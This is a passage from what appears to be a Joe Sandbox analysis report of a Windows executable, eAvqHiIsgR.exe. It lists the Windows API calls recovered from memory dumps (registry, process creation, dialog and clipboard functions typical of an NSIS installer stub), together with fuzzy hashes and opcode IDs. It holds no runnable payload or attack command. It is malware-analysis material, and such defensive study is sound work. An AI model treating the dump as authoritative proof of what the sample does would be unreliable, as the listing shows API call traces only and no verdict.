                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID:
                                                                      • API String ID: 1096422788-0
                                                                      • Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                                      • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                                      • Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                                      • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                      • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                                      • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                      • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                      • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
                                                                      • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                      • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                      • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                      • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                      • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                      APIs
                                                                        • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                        • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                        • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,759223A0), ref: 0040527A
                                                                        • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                        • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                        • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                        • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                                        • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                                        • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                                        • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2972824698-0
                                                                      • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                      • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                                      • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                      • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                      • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                                      • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                      • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                                      • GetClientRect.USER32(?,?), ref: 00405407
                                                                      • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                      • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                        • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                      • ShowWindow.USER32(00000000), ref: 00405554
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                      • ShowWindow.USER32(00000008), ref: 004055A1
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                      • CreatePopupMenu.USER32 ref: 004055E6
                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                                      • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                      • OpenClipboard.USER32(00000000), ref: 00405680
                                                                      • EmptyClipboard.USER32 ref: 00405686
                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                                      • CloseClipboard.USER32 ref: 004056D7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID:
                                                                      • API String ID: 590372296-0
                                                                      • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                      • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                      • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                      • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                      • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                      • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                                      • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                        • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                        • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                        • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                        • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\eAvqHiIsgR.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                        • Part of subcall function 004063D2: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                      • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                        • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                        • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                        • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: #AT$A$C:\Users\user\tranchet$Call
                                                                      • API String ID: 2624150263-3922936877
                                                                      • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                      • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                      • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                      • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                      • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                      • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                      • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                      • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                      • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                      • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                      • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                                      • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                      • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                        • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                      • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                                      • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                                      • ShowWindow.USER32(00000000), ref: 0040517B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $#AT$M$N
                                                                      • API String ID: 2564846305-3650667177
                                                                      • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                      • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                      • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                      • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                      • ShowWindow.USER32(?), ref: 00403D00
                                                                      • DestroyWindow.USER32 ref: 00403D14
                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                                      • GetDlgItem.USER32(?,?), ref: 00403D51
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
